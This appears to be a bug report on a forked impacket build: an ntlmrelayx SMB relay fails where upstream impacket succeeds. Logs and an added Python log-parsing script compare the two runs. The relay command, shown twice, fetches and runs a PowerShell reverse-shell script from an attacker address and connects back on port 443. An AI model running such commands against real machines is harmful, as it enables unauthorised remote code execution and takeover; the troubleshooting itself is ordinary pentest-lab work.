Configuration
impacket version: v0.10.1.dev1+20230909.241.3001b26
Target OS: Linux kali 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03) x86_64 GNU/Linux
Using a pipx installation, so it is in a fully isolated environment.
Context
I used to use this repository instead of the official impacket repository because... it's just better. Anyway, that's not the point! So I wanted to do an NTLM relay, running a command on the target machine, with:
ntlmrelayx.py --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
Connected to another machine, I use the command dir \\192.168.45.242\t to trigger the relay. And that's where things go wrong. Nothing happens:
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b26 - Copyright 2022 Fortra - forked by ThePorgs
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-7 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-8 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-10 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-11 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-12 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-13 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-14 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-15 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
Whereas with impacket-ntlmrelayx, it works and I have my shell:
$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-9 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[*] SMBD-Thread-11 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
What could be the root cause?
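An added triage script, not part of this issue or of either impacket tree, that makes the difference between the two runs above explicit. It parses the three ntlmrelayx log line shapes quoted in the issue (connection received and relayed toward a target, the "Authenticating against ... SUCCEED/FAILED" result, and the "no more targets left" message) and reports, per target, whether a relayed NTLM authentication ever completed. The two log excerpts embedded below are constructed, shortened copies of the output quoted above; the regexes assume the message wording shown in those lines.

```python
import re
from collections import Counter

# Line shapes taken from the ntlmrelayx output quoted in this issue.
RECEIVED = re.compile(r"Received connection from (\S+), attacking target (\S+)")
AUTH = re.compile(r"Authenticating against (\S+) as (\S+) (SUCCEED|FAILED)")
NO_TARGETS = re.compile(r"Connection from (\S+) controlled, but there are no more targets left")


def summarize_relay_log(text):
    """Count, per relay target, how many connections were relayed toward it
    and how many produced an authentication result on the target side."""
    summary = {
        "attacks_started": Counter(),  # target -> client connections relayed toward it
        "auth_succeeded": Counter(),   # target -> relayed logons the target accepted
        "auth_failed": Counter(),      # target -> relayed logons the target rejected
        "no_more_targets": 0,          # clients that authenticated after the target was used up
    }
    for line in text.splitlines():
        m = RECEIVED.search(line)
        if m:
            summary["attacks_started"][m.group(2)] += 1
            continue
        m = AUTH.search(line)
        if m:
            key = "auth_succeeded" if m.group(3) == "SUCCEED" else "auth_failed"
            summary[key][m.group(1)] += 1
            continue
        if NO_TARGETS.search(line):
            summary["no_more_targets"] += 1
    return summary


def diagnose(summary):
    """Per-target verdict. A target with relayed connections but no
    SUCCEED/FAILED line never reached the end of the NTLM exchange."""
    verdict = {}
    for target, started in summary["attacks_started"].items():
        if summary["auth_succeeded"][target]:
            verdict[target] = "relayed"
        elif summary["auth_failed"][target]:
            verdict[target] = "rejected by target"
        elif started:
            verdict[target] = "no auth result logged"
    return verdict


# Constructed excerpts (shortened) of the two runs quoted in the issue.
FORK_LOG = """\
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
"""

UPSTREAM_LOG = """\
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
"""

if __name__ == "__main__":
    for name, log in (("fork", FORK_LOG), ("upstream", UPSTREAM_LOG)):
        s = summarize_relay_log(log)
        print(name, dict(s["attacks_started"]), diagnose(s), "spare clients:", s["no_more_targets"])
```

Run against the two excerpts, the fork run shows three connections relayed toward smb://192.168.240.212 and no authentication result at all, while the upstream run shows one relayed connection that the target accepted, after which further client connections are reported as having no target left. That is the line to look for when comparing runs: until "Authenticating against ... SUCCEED" appears, the -c command is never attempted, so the absence of a shell follows directly from the relay never completing the NTLM exchange.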